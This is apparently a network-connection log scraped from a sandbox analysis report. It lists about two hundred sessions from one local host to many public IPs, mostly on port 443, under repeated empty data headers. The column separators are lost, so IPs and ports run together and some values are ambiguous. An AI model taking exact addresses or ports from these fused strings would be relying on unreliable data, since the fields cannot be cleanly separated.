                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18490192.168.2.1453592143.248.91.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18491192.168.2.145822298.188.192.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18492192.168.2.145858066.100.76.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18493192.168.2.144860281.52.61.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18494192.168.2.144750862.208.5.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18495192.168.2.144469263.195.105.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18496192.168.2.144206067.154.137.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18497192.168.2.143279250.210.98.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18498192.168.2.1434554144.77.253.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18499192.168.2.144622282.192.33.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18500192.168.2.145419475.84.125.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18501192.168.2.1440438184.240.151.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18502192.168.2.144415232.153.7.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18503192.168.2.1442028221.106.14.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18504192.168.2.143404485.83.57.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18505192.168.2.1445522188.65.254.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18506192.168.2.143910248.136.143.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18507192.168.2.1448694181.19.207.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18508192.168.2.143696412.118.219.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18509192.168.2.1456662136.62.239.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18510192.168.2.1447420162.80.154.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18511192.168.2.145997823.2.141.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18512192.168.2.144647641.194.8.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18513192.168.2.1446782147.127.76.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18514192.168.2.1437658106.238.253.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18515192.168.2.1450780174.161.88.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18516192.168.2.1448030188.10.227.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18517192.168.2.145297281.152.119.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18518192.168.2.144497251.50.151.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18519192.168.2.144532291.192.123.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18520192.168.2.143503212.233.91.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18521192.168.2.144240446.146.86.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18522192.168.2.1447086125.142.67.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18523192.168.2.1459918163.9.215.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18524192.168.2.1432982186.110.116.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18525192.168.2.1455784159.132.182.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18526192.168.2.1460220104.60.134.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18527192.168.2.145791259.117.43.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18528192.168.2.145935418.22.242.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18529192.168.2.1441022164.176.178.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18530192.168.2.144684672.218.174.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18531192.168.2.143536054.192.123.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18532192.168.2.1444218168.3.219.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18533192.168.2.1442466133.188.241.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18534192.168.2.1444668100.207.205.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18535192.168.2.1435824156.61.16.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18536192.168.2.1452802101.146.19.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18537192.168.2.1452296163.92.21.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18538192.168.2.1438816168.83.44.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18539192.168.2.145708679.11.63.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18540192.168.2.1438102135.170.65.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18541192.168.2.1435108143.248.218.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18542192.168.2.1458328108.55.117.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18543192.168.2.1436304190.186.205.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18544192.168.2.144097287.111.113.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18545192.168.2.1444566169.61.154.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18546192.168.2.1452690110.102.25.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18547192.168.2.1442892148.236.214.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18548192.168.2.143294093.85.0.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18549192.168.2.145018258.40.81.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18550192.168.2.145101653.52.209.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18551192.168.2.1459612180.80.65.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18552192.168.2.144237450.250.38.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18553192.168.2.1451702183.34.112.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18554192.168.2.1445012184.38.11.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18555192.168.2.144136892.69.53.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18556192.168.2.144037874.174.41.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18557192.168.2.1448824133.118.79.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18558192.168.2.144424054.156.30.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18559192.168.2.1437292111.222.130.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18560192.168.2.146073813.19.168.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18561192.168.2.1455008168.242.127.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18562192.168.2.1460564139.73.135.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18563192.168.2.145487435.130.63.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18564192.168.2.1457200164.100.3.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18565192.168.2.1459996181.4.132.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18566192.168.2.145673441.224.44.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18567192.168.2.1437524160.43.147.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18568192.168.2.1449666170.79.39.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18569192.168.2.1448460184.78.194.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18570192.168.2.143877078.71.120.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18571192.168.2.143517860.57.85.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18572192.168.2.1460640206.253.100.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18573192.168.2.145296297.11.60.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18574192.168.2.1439156194.37.99.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18575192.168.2.1459016196.165.143.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18576192.168.2.1452152198.232.17.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18577192.168.2.1455772211.117.49.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18578192.168.2.1443314132.2.229.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18579192.168.2.143923842.238.224.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18580192.168.2.1437162138.70.129.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18581192.168.2.1443536183.251.202.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18582192.168.2.1443094168.116.151.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18583192.168.2.144944884.157.120.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18584192.168.2.1434310218.116.83.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18585192.168.2.145220813.119.181.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18586192.168.2.144747632.225.93.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18587192.168.2.145546059.105.208.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18588192.168.2.144393270.139.174.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18589192.168.2.143790427.113.208.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18590192.168.2.145657841.143.41.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18591192.168.2.1445598207.134.97.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18592192.168.2.143924099.119.204.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18593192.168.2.1440816222.237.227.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18594192.168.2.1458506112.230.8.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18595192.168.2.1437258153.143.97.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18596192.168.2.1454000153.73.192.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18597192.168.2.1460652139.87.15.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18598192.168.2.1456652118.67.205.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18599192.168.2.1443132169.28.181.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18600192.168.2.1452558116.179.152.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18601192.168.2.1446414142.192.82.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18602192.168.2.144124853.205.143.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18603192.168.2.145341038.66.254.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18604192.168.2.1435014157.45.97.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18605192.168.2.145882832.74.53.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18606192.168.2.1438630122.79.211.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18607192.168.2.145727477.14.177.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18608192.168.2.143371272.35.53.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18609192.168.2.145273689.99.232.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18610192.168.2.145945891.45.217.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18611192.168.2.1460076120.186.126.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18612192.168.2.144052823.65.97.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18613192.168.2.145497837.71.104.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18614192.168.2.1439670180.250.182.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18615192.168.2.144733413.142.7.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18616192.168.2.143478646.1.20.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18617192.168.2.1455064160.83.36.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18618192.168.2.1434532181.0.142.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18619192.168.2.1442388210.46.57.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18620192.168.2.1443388192.174.131.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18621192.168.2.1450980210.193.65.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18622192.168.2.145911694.33.192.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18623192.168.2.1435824162.223.85.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18624192.168.2.1445904104.155.111.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18625192.168.2.1452038119.19.10.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18626192.168.2.143999417.88.246.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18627192.168.2.145429848.149.47.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18628192.168.2.1441220171.240.89.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18629192.168.2.145975848.95.1.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18630192.168.2.1449620185.33.164.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18631192.168.2.1449840167.68.145.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18632192.168.2.1439450164.129.84.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18633192.168.2.1457286111.236.245.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18634192.168.2.1460380140.149.199.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18635192.168.2.1459646141.105.122.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18636192.168.2.1454654189.255.177.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18637192.168.2.1452588137.156.148.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18638192.168.2.145591885.255.12.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18639192.168.2.1448500167.71.105.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18640192.168.2.14408822.137.94.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18641192.168.2.145130660.41.139.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18642192.168.2.145137064.64.240.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18643192.168.2.1447154140.254.119.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18644192.168.2.1450222208.70.204.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18645192.168.2.1451710207.12.111.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18646192.168.2.144642853.237.185.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18647192.168.2.144469851.14.30.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18648192.168.2.1440168119.83.120.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18649192.168.2.1460004137.118.222.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18650192.168.2.145468459.195.28.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18651192.168.2.1452534191.126.0.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18652192.168.2.1459108120.95.216.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18653192.168.2.143484877.250.112.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18654192.168.2.1437778119.2.232.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18655192.168.2.1453638148.22.93.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18656192.168.2.145872214.47.58.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18657192.168.2.14590748.112.31.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18658192.168.2.1456414201.99.81.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18659192.168.2.1456904108.8.40.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18660192.168.2.1435952196.254.26.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18661192.168.2.143913835.94.222.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18662192.168.2.143383289.98.217.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18663192.168.2.1443014108.194.133.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18664192.168.2.1445188209.49.64.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18665192.168.2.1441524141.23.190.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18666192.168.2.1453628117.167.27.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18667192.168.2.1454156221.93.170.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18668192.168.2.1456358218.108.81.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18669192.168.2.1448744219.163.248.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18670192.168.2.1457324132.6.63.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18671192.168.2.1440458109.139.128.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18672192.168.2.1459264103.150.253.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18673192.168.2.1460468155.36.231.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18674192.168.2.145798651.148.251.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18675192.168.2.145514286.14.66.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18676192.168.2.1441018213.43.163.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18677192.168.2.1443102116.194.24.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18678192.168.2.1448518180.199.143.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18679192.168.2.1453860181.214.255.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18680192.168.2.1455692145.138.245.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18681192.168.2.1447608109.51.208.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18682192.168.2.145916831.199.214.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18683192.168.2.1451994202.213.65.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18684192.168.2.1445822126.114.231.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18685192.168.2.146057638.195.251.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18686192.168.2.145922498.201.114.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18687192.168.2.1454700208.129.85.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18688192.168.2.1447356196.117.186.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18689192.168.2.1448622153.14.108.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18690192.168.2.144797499.26.110.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18691192.168.2.1434176140.55.216.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18692192.168.2.1441594155.17.30.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18693192.168.2.144782418.157.208.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18694192.168.2.1433524201.147.41.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18695192.168.2.1451538222.233.33.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18696192.168.2.145580044.40.45.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18697192.168.2.1434012104.146.250.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18698192.168.2.1437746137.249.4.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18699192.168.2.1445838170.179.54.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18700192.168.2.145073018.58.73.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18701192.168.2.1433818152.93.245.96443
                                                        TimestampBytes transferredDirectionData


